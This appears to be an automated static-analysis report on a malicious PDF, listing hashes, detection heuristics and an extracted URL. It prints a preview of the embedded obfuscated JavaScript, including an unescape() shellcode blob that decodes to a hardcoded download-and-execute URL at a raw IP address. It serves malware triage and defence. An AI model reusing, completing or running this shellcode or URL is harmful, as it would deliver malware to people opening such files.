Malicious PDF — malware analysis report

Static analysis result for SHA-256 370899a0853aeb51…

MALICIOUS

PDF

2.6 KB First seen: 2026-05-10
MD5: 19a9f17d267b0d2efcd4c81dc15d81d6 SHA-1: 3fc08e499768c25b33f9412766d537d23ceb3a86 SHA-256: 370899a0853aeb516495b98bf38a445fbe63303139f40a84df93d66ea7fc7d45
190 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_UNESCAPE call suggests that the JavaScript may be obfuscated to hide its malicious intent. The script's purpose is likely to download and execute a second-stage payload or exploit a known PDF vulnerability. No specific family could be identified due to the lack of further indicators.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 6

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
      var self = this;
  var sc = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a9 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://121.101.216.203/bu1/news.php?dd=OkExQXtfczN4c3RyOjI0S1RBZTZ1QmVwJSQ2TzFsMC9FMDVGWDhYImIrInFnXW1xQnVhVHUibisyL3NmNzlZTWl2WyJTdVJbbDE7LDY7Il Referenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3C5 1659 bytes
SHA-256: 9f7047d00b5b259f3ee0712a6d315ba21302f791cd0acafcd1c1eed94a8a3eb2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function UGdikpUs6PZuKnwyAc48hFBm(){
  Function.prototype.bind = function(c) {
    var f=this;
    return function() {f.apply(c);}
  };
  function bB0vKHWiMjSq()
{
  var self = this;
  var sc = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a99%u8a5f%udfcf%ua719%uec19%u1963%u19af%u1ac7%ub975%u4512%ub9f3%u66ca%u75ce%u9d5e%uc59a%ub7f8%u5efc%u9add%ue19d%u99fc%uaa99%uc959%ucac9%uc9cf%uce66%u1265%uc945%u66ca%u69ce%u66c9%u6dce%u59aa%u1c35%uec59%uc860%ucfcb%u66ca%uc34b%u32c0%u777b%u59aa%u715a%u66bf%u6666%ufcde%uc9ed%uf6eb%ud8fa%ufdfd%ufceb%ueaea%ude99%uedfc%ue0ca%uedea%uf4fc%uf0dd%ufceb%uedfa%uebf6%ud8e0%uce99%uf7f0%ue1dc%ufafc%udc99%uf0e1%ucded%uebf1%uf8fc%u99fd%uf6d5%ufdf8%uf0d5%uebfb%uebf8%ud8e0%uec99%uf5eb%uf6f4%u99f7%ucbcc%uddd5%ueef6%uf5f7%uf8f6%ucdfd%udff6%uf5f0%ud8fc%u6899%u7474%u3a70%u2f2f%u3231%u2e31%u3031%u2e31%u3132%u2e36%u3032%u2f33%u7562%u2f31%u656e%u7377%u702e%u7068%u643f%u3d64%u6b4f%u7845%u5851%u6674%u7a63%u344e%u3363%u7952%u6a4f%u3049%u3153%u4252%u545a%u315a%u6d51%u7756%u534a%u3251%u7a54%u7346%u434d%u4639%u444d%u4756%u4457%u5968%u6d49%u7249%u6e49%u6e46%u5758%u7831%u6e51%u6856%u4856%u6955%u6962%u7973%u334c%u6d4e%u7a4e%u5a6c%u5754%u326c%u7957%u544a%u5664%u624a%u4462%u3745%u444c%u3759%u6c49%u4

Open this report in the interactive analyzer, or submit your own file for analysis.